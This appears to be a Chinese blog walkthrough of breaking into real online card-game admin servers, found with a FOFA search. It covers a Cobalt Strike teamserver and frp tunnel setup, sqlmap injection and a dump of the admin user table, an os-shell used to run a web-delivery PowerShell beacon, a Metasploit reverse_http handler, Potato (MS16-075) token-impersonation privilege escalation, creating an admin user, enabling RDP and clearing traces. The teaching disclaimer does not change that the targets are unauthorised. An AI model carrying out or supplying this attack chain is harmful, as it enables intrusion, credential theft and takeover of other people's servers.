frp过来cs上线一起打牌吧

  • A+
所属分类:安全工具 安全文章

免责声明:本文提及的安全环境、工具和方法等仅供试用及教学用途,禁止非法使用,请与24小时内删除!


前期准备

1、搭建cs4.0

首先下载,cs4.0的安装包,然后把包上传到自己的服务器上面,我这里演示使用的是阿里云把包上传服务器上面解压


frp过来cs上线一起打牌吧


刚解压的文件,可能没有执行权限,需要给执行文件teamserver增加权限:chmod 777 teamserver

然后我们就可以启动cs,在解压后的目录下:执行


 ./teamserver 阿里云服务器ip 密码

返回这样就是启动成功了,服务端就搭建好了


frp过来cs上线一起打牌吧


可以在自己的电脑,或者虚拟机上面执行bat文件(win)就可以了


frp过来cs上线一起打牌吧

双击输入参数,点击连接


frp过来cs上线一起打牌吧


然后就可以多人运动,进入游戏了


frp过来cs上线一起打牌吧


在这次测试中,需要在监听器修改一下参数


frp过来cs上线一起打牌吧


Add一个,随便写个名字,选中foreign HTTP模式,填写host:阿里云服务器。端口:4444  —— Save


frp过来cs上线一起打牌吧



2、frp内网穿透

下载frp压缩包,上传服务器,加压


frp过来cs上线一起打牌吧


然后修改frps.ini里面的配置信息:vi frps.ini

我这边用端口4444


frp过来cs上线一起打牌吧


然后启动frp:

./frps -c frps.ini


frp过来cs上线一起打牌吧


在kali里面配置frpc.ini


frp过来cs上线一起打牌吧


然后启动客户端


./frps -c frps.ini


frp过来cs上线一起打牌吧

frp后台启动命令


    服务端:nohup ./frps -c frps.ini >/dev/null 2>&1 &    客户端:nohup ./frpc -c frpc.ini >/dev/null 2>&1 &    说明:>/dev/null 2>&1 &,表示丢弃。



准备阶段完了,打牌~



首先信息收集一波确认目标:fofa:body="棋牌后台管理系统" && title=="后台登录"


打开链接后台页面是这样的


frp过来cs上线一起打牌吧


前台是这样的

frp过来cs上线一起打牌吧



单刀直入,不带人跳坑,工具人肯定是直接使用工具的撒,在后台登录页面随便输入账号密码直接抓包


frp过来cs上线一起打牌吧


把数据包保存下来txt


frp过来cs上线一起打牌吧


然后sqlmap直接跑 当时是没有截图,人家的sqlmap是用来跑的,我的sqlmap是用来爬的,龟速,直接帖命令加结果

sqlmap -r post.txt --dbs     //跑数据库名

知道管理在RYPlatformManagerDB数据库中(当时没截图,只是把跑出来的数据贴出了文档)


frp过来cs上线一起打牌吧



继续


sqlmap -r post.txt -D RYPlatformManagerDB --tables     //跑表名



frp过来cs上线一起打牌吧


猜测数据存放在表dbo.Base_Users中(当时龟速跑了好几个表才知道)


sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --columns    //跑字段名



当时我是没有跑字段名,直接把整个表给打印出来


sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --dump



frp过来cs上线一起打牌吧



跑出来的Password是MD5加密过的,去查询了一下解密是收费的。花钱是不可能花钱的,直接给大佬口算(给有钱的大佬去解密)


frp过来cs上线一起打牌吧


得到结果后,直接使用账号密码,成功登录后台(听说有些后台没有怎么处理,能使用弱密码123456直接登,后来我也遇到过一个)

登录进入后台的页面


frp过来cs上线一起打牌吧


大概看了一下,没思路,机器人比真人还要多的,确定还要玩这样的游戏??


以为这样就结束了吗,答案是不可能


前面知道在后台管理登录页面存在sql注入,那么在sqlmap里面有这么一个参数:--os-shell   获得交互式操作系统的shell


sqlmap -r -post.txt –os-shell



frp过来cs上线一起打牌吧



然后现在在这里用到了前期搭建的cs4.0来上线

在多人运动游戏里面选择攻击-钓鱼-scripted WEB Delivery


frp过来cs上线一起打牌吧


然后会弹窗,把ps命令复制粘贴到kali里面的os-shell执行上线即可


frp过来cs上线一起打牌吧


上线后可以看到


frp过来cs上线一起打牌吧


然后选中会话右键-目标文件管理/其他操作(自己去尝试)


frp过来cs上线一起打牌吧


文件管理这边可以进行一下操作,但是权限不大


frp过来cs上线一起打牌吧


在cs里也能进行一些操作,但是太菜了,还是直接连msf把。利用跟前面搭建好的frp内网穿透,来实现。把服务端跟客户端的frp都启动,确保连接上了之后。在kali终端里执行



msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_http   //这里一定要用httpset LHOST 127.0.0.1  //这里是监听本地地址即可set LPORT 1234   //端口需要跟前面frp配置的端口对应run


执行完之后,在cs上面,多add一个监听器,配置如下


frp过来cs上线一起打牌吧


然后在刚上线的服务器。右键增加会话-选择杠添加的会话


frp过来cs上线一起打牌吧


返回kali稍微等一下,连接成功即可


frp过来cs上线一起打牌吧


现在msf能成功连接上,操作性就更多了,直接进去查看发现权限是很低的


frp过来cs上线一起打牌吧

然后接下来提权

这边用到了土豆提权(MS16-075)



meterpreter > upload  /root/potato.exe C:UsersPublic     //上传文件meterpreter > cd C:\Users\Public   //切换路径meterpreter > use incognito  meterpreter > list_tokens -u  //查看当前令牌信息meterpreter > execute -cH -f ./potato.exe   //运行文件meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"   //切换高权限的令牌,不一定是这个,自己看执行文件后列出的令牌信息meterpreter > getuid   //查看是否成功切换了



在msf中上传文件到C盘user的公共目录下


frp过来cs上线一起打牌吧


然后打开文件


frp过来cs上线一起打牌吧


继续提权,查看当前的权限情况,这边可以看到权限是很小的


frp过来cs上线一起打牌吧


执行上传的文件,在查看一下令牌信息(命令:meterpreter > execute -cH -f ./potato.exe   /运行文件,没截到)


frp过来cs上线一起打牌吧


然后窃取权限比较高的令牌,然后再看一下当前的权限情况


frp过来cs上线一起打牌吧


现在已经窃取成功,那么直接shell进去看看(乱码的话这里可以用chcp 65001修正)


frp过来cs上线一起打牌吧


然后先创建个用户,提升为管理员权限


frp过来cs上线一起打牌吧


查看一下有没有开放3389(然而并没有)


frp过来cs上线一起打牌吧


他没开,自己给他开一个就好了,直接连上,成功登录


frp过来cs上线一起打牌吧


最后看到这服务器的配置,我承认我酸了


frp过来cs上线一起打牌吧


最后把清理战场(清除痕迹),关机走人


总结:前期通过sqlmap去爬,然后用CS去生成链接丢去sqlmap里面执行上线,通过frp内网穿透,把CS上线的shell传给kali里面的msf继续操作,然后用到烂土豆去提权,(MS16-075)。文章已经做到尽可能详细了,有疑问可以后台给我留言一起啊交流哦!文章写得有点乱,见怪莫怪哈,看完相信会有所收获~


最后把文中使用到的工具打包供大佬下载学习,在公众号回复:打牌   获取下载链接


免责声明:本文提及的安全环境、工具和方法等仅供试用及教学用途,禁止非法使用,请与24小时内删除!


frp过来cs上线一起打牌吧

----------------------------------关注再走呗--------------------------------


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: